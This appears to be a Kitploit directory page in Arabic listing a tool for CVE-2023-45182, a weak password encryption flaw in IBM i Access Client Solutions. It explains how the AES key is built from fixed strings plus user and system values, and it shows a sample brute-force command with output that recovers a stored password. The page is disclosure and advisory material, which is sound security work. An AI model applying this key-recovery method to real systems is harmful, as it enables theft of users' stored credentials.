Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-45182 — IBM i Access Client Solutions < 1.1.9.4 - تشفير كلمة مرور ضعيف | Kitploit
أدوات/GitHubGitHub/afine-com/cve-2023-45182
كسر كلمات المرورأدوات التشفير/فك التشفيرتحليل الثغرات الأمنيةالاستغلالالتشفير
GitHubafine-com/cve-2023-45182

CVE-2023-45182

IBM i Access Client Solutions < 1.1.9.4 - تشفير كلمة مرور ضعيف

عرض المستودع
منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-45182

IBM i Access Client Solutions < 1.1.9.4 - تشفير كلمة مرور ضعيف

الجدول الزمني

  • تم الإبلاغ عن الثغرة للبائع: 22.09.2023
  • إصدار النسخة 1.1.9.4 المُصلحة الجديدة: 08.12.2023
  • الإفصاح العام: 15.12.2023

الوصف

يستخدم IBM i Access Client Solutions لتخزين كلمات مرور المستخدمين خوارزمية AES، ومع ذلك فإن مفتاح التشفير ذو 16 بايت هو مزيج من سلسلة ثابتة (Thanatos) وأحرف عشوائية من سلسلة تتكون من سلسلة ثابتة أخرى (Behemoth) مُدمجة مع اسم المستخدم، المجلد الرئيسي للمستخدم، نظام التشغيل (مثل Linux) مُدمجة مع الدليل الحالي الذي تم بدء التطبيق منه. ونتيجة لذلك، نصف مفتاح التشفير ثابت (السلسلة Thanatos) بينما النصف الآخر محدود جدًا. مما يسهل جدًا على المهاجم تجربة كلمات المرور بالقوة الغاشمة حتى على نواة معالج واحدة.

فيما يلي مثال لفك تشفير كلمة مرور المستخدم mmajchrowicz باستخدام البرنامج النصي as400_password_bruteforce_tool.java من حساب mkubiak:

root@kitploit:~
┌──(mkubiak㉿localhost)-[/tmp/mkubiak]
└─$ java as400_password_bruteforce_tool.java mmajchrowicz_funciton_admin_work.bin Linux mmajchrowicz /opt

IBM AS400 Password Bruteforce Tool v0.3 by Michał Majchrowicz AFINE Team

Full keyspace: mmajchrowiczLinux/opt/home/mmajchrowiczBehemoth
Full keyspace length: 47

Reduced keyspace: BmajchrowizLnux/pte
Reduced keyspace length: 19

Found good pass: Thanatosaun/Lcmo

Encrypted system password 7 bytes:
2E 1B 10 0A 1B 0D 0A
Decrypted system password 7 bytes:
50 65 6E 74 65 73 74

Decrypted system password: Pentest

هذه المشكلة ناتجة عن تطبيق تشفير كلمة مرور ضعيف. تم إصلاح هذه المشكلة في IBM i Access Client Solutions 1.1.9.4.

الإصدارات المتأثرة

< 1.1.9.4

التوصية

قم بتحديث IBM i Access Client Solutions إلى الإصدار 1.1.9.4 أو أحدث.

المراجع

  • https://www.ibm.com/support/pages/node/7091942
  • https://nvd.nist.gov/vuln/detail/CVE-2023-45182
تنزيل الأداة